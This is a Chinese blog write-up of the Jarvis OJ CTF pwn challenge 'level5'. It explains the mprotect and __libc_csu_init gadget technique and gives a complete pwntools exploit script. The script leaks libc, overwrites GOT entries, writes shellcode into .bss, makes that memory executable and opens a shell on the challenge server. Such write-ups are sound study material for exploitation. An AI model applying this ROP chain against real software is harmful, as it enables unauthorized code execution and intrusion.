CTF-PWN level5(Jarvis Oj)

版权声明：本文为博主原创文章，未经博主允许不得转载。 https://blog.csdn.net/getsum/article/details/90261270

和level3_x64一样的文件，但是限制不能使用system和execv函数拿shell，但是可以用mmap和mprotect完成本题。

我尝试用mprotect来解决，首先mprotect的结构如下：

int mprotect(const void *start, size_t len, int prot);

参数的含义是：把从start开始长度为len的内存区的保护属性修改为prot指定的值，同时这个prot的值和linux的权限属性值相同

所以我们的大概思路就是：

修改.bss中内存的权限，然后将shellcode写入.bss段中执行即可。

不过具体操作起来有点小问题，因为通过ROPgadget命令可以查到pop rdi/rsi的地址，但是第三个参数rdx查不到。

这里用到了“万能GADGET”，即64位ELF文件中会有一个名叫__libc_csu_init的函数，而这个函数中会有许多我们能利用的命令

可以看到从0x4006aa开始便是一堆pop操作，然后在0x400690处开始把r13 r14 r15分别存入rdi rsi rdx中，然后一个call执行r12+rbx*8处的函数。并且注意到call指令之后，如果rbx和rbp刚刚好只差1，那么将继续执行回0x4006a6，我们又可以对相应寄存器进行操作。

from pwn import *
context.arch='amd64'
#p=process('./l3')
p=remote("pwn2.jarvisoj.com",9884)
libc=ELF('./libc-2.19.so')
elf=ELF('./l3')
offset=0x80
write_plt=elf.plt['write']
write_got=elf.got['write']
read_plt=elf.plt['read']
read_got=elf.got['read']
bss_addr=elf.bss()
main_addr=elf.symbols['main']
pop_rdi_ret=0x4006b3
pop_rsi_r15_ret=0x4006b1
pop_rbx_rbp_r12_r13_r14_r15_ret=0x4006aa
call_addr=0x400690

#泄露libc基地址
p.recvuntil('Input:\n')
payload='a'*(offset+8)+p64(pop_rdi_ret)+p64(0x1)+p64(pop_rsi_r15_ret)+p64(read_got)+'deadbeef'+p64(write_plt)+p64(main_addr)
p.send(payload)
libc.address=u64(p.recv(8))-libc.symbols["read"]#修改libc基地址
print hex(libc.address)

#把mprotect函数地址写到_libc_start_main中，之后调用_libc_start_main即为调用mprotect
p.recvuntil('Input:\n')
libc_start_main_got=elf.got['__libc_start_main']
payload='a'*(offset+8)+p64(pop_rdi_ret)+p64(0x0)+p64(pop_rsi_r15_ret)+p64(libc_start_main_got)+'deadbeef'+p64(read_plt)+p64(main_addr)
p.send(payload)
mprotect_addr=libc.symbols['mprotect']
print hex(mprotect_addr)
p.send(p64(mprotect_addr))

#shellcode写入.bss段内
p.recvuntil('Input:\n')
payload='a'*(offset+8)+p64(pop_rdi_ret)+p64(0x0)+p64(pop_rsi_r15_ret)+p64(bss_addr)+'deadbeef'+p64(read_plt)+p64(main_addr)
p.send(payload)
shellcode=asm(shellcraft.amd64.sh())
print shellcode
p.send(shellcode)

#把.bss段地址写入_gmon_start中，调用_gmon_start即为调用.bss中存入的shellcode
p.recvuntil('Input:\n')
gmon_start_got=elf.got['__gmon_start__']
payload='a'*(offset+8)+p64(pop_rdi_ret)+p64(0x0)+p64(pop_rsi_r15_ret)+p64(gmon_start_got)+'deadbeef'+p64(read_plt)+p64(main_addr)
p.send(payload)
p.send(p64(bss_addr))

#修改权限，运行shellcode
p.recvuntil('Input:\n')
payload='a'*(offset+8)+p64(pop_rbx_rbp_r12_r13_r14_r15_ret)+p64(0)+p64(1)+p64(libc_start_main_got)+p64(7)+p64(0x1000)+p64(0x600000)+p64(call_addr)
payload+='deadbeef'+p64(0)+p64(1)+p64(gmon_start_got)+p64(0)+p64(0)+p64(0)+p64(call_addr)
p.send(payload)
p.interactive()